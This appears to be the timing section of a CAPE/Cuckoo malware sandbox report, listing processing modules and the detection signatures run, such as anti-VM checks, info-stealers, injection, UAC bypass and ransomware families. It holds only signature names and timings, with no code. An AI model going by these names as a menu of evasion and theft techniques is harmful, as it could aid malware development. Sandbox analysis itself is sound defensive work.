  • 3.627 CAPE
  • 1.908 Dropped
  • 1.836 Static
  • 1.707 TargetInfo
  • 0.448 Strings
  • 0.416 Deduplicate
  • 0.204 TrID
  • 0.007 NetworkAnalysis
  • 0.005 AnalysisInfo
  • 0.002 Debug

Signatures ( 2.403 seconds )

  • 0.419 antidbg_windows
  • 0.356 antiav_detectreg
  • 0.146 stealth_timeout
  • 0.138 decoy_document
  • 0.123 infostealer_ftp
  • 0.109 api_spamming
  • 0.103 NewtWire Behavior
  • 0.075 antianalysis_detectreg
  • 0.068 infostealer_im
  • 0.065 antivm_generic_scsi
  • 0.038 mimics_filetime
  • 0.036 antivm_vbox_keys
  • 0.032 Doppelganging
  • 0.032 stealth_file
  • 0.026 antivm_generic_services
  • 0.025 antivm_vmware_keys
  • 0.023 antivm_vbox_window
  • 0.023 recon_fingerprint
  • 0.019 uac_bypass_eventvwr
  • 0.018 bootkit
  • 0.018 kibex_behavior
  • 0.018 antisandbox_script_timer
  • 0.018 antivm_xen_keys
  • 0.018 darkcomet_regkeys
  • 0.017 antivm_generic_disk
  • 0.017 persistence_autorun
  • 0.017 antivm_parallels_keys
  • 0.015 betabot_behavior
  • 0.013 recon_programs
  • 0.013 virus
  • 0.013 geodo_banking_trojan
  • 0.012 antivm_generic_diskreg
  • 0.012 antivm_vpc_keys
  • 0.011 antiav_detectfile
  • 0.01 malicious_dynamic_function_loading
  • 0.01 antiemu_wine_func
  • 0.01 dynamic_function_loading
  • 0.01 ransomware_files
  • 0.009 InjectionCreateRemoteThread
  • 0.008 injection_createremotethread
  • 0.008 infostealer_browser_password
  • 0.008 kovter_behavior
  • 0.008 hancitor_behavior
  • 0.008 browser_security
  • 0.008 infostealer_bitcoin
  • 0.007 injection_runpe
  • 0.007 InjectionProcessHollowing
  • 0.006 exploit_getbasekerneladdress
  • 0.006 dridex_behavior
  • 0.006 EvilGrab
  • 0.006 antivm_hyperv_keys
  • 0.006 disables_browser_warn
  • 0.006 packer_armadillo_regkey
  • 0.006 remcos_regkeys
  • 0.005 InjectionInterProcess
  • 0.005 infostealer_browser
  • 0.005 exploit_gethaldispatchtable
  • 0.005 antivm_xen_keys
  • 0.005 bypass_firewall
  • 0.004 antivm_vbox_libs
  • 0.004 exploit_heapspray
  • 0.004 stack_pivot
  • 0.004 RegBinary
  • 0.004 antisandbox_sleep
  • 0.004 shifu_behavior
  • 0.004 Raccoon Behavior
  • 0.004 antivm_generic_bios
  • 0.004 antivm_generic_cpu
  • 0.004 antivm_generic_system
  • 0.004 antivm_vbox_files
  • 0.004 ransomware_extensions
  • 0.003 persistence_registry_script
  • 0.003 antidebug_guardpages
  • 0.003 antiav_avast_libs
  • 0.003 persistence_bootexecute
  • 0.003 Sodinokibi Behavior
  • 0.003 modifies_desktop_wallpaper
  • 0.003 PlugX
  • 0.003 persistence_autorun_tasks
  • 0.003 browser_addon
  • 0.003 modify_proxy
  • 0.002 tinba_behavior
  • 0.002 banker_prinimalka
  • 0.002 hawkeye_behavior
  • 0.002 gootkit_behavior
  • 0.002 Vidar Behavior
  • 0.002 creates_largekey
  • 0.002 antisandbox_sunbelt_libs
  • 0.002 antisandbox_sboxie_libs
  • 0.002 ipc_namedpipe
  • 0.002 exec_crash
  • 0.002 InjectionSetWindowLong
  • 0.002 cerber_behavior
  • 0.002 antianalysis_detectfile
  • 0.002 antidbg_devices
  • 0.002 disables_system_restore
  • 0.002 disables_windows_defender
  • 0.002 office_martian_children
  • 0.002 modify_security_center_warnings
  • 0.002 stealth_hiddenreg
  • 0.001 stack_pivot_file_created
  • 0.001 network_tor
  • 0.001 sets_autoconfig_url
  • 0.001 rat_nanocore
  • 0.001 rat_luminosity
  • 0.001 antivm_vmware_libs
  • 0.001 injection_explorer
  • 0.001 neshta_regkeys
  • 0.001 ransomware_message
  • 0.001 ursnif_behavior
  • 0.001 neshta_files
  • 0.001 antiav_bitdefender_libs
  • 0.001 securityxploded_modules
  • 0.001 antiemu_wine_reg
  • 0.001 antivm_vbox_devices
  • 0.001 antivm_vmware_files
  • 0.001 bot_drive
  • 0.001 modify_uac_prompt
  • 0.001 persistence_shim_database
  • 0.001 ransomware_radamant
  • 0.001 rat_pcclient
  • 0.001 rat_spynet
  • 0.001 stealth_hide_notifications

Reporting ( 0.057 seconds )

  • 0.057 CompressResults
Task ID 94396
Mongo ID 5d9e78dfc3c009112d67cf9a
Cuckoo release 1.3-CAPE
Delete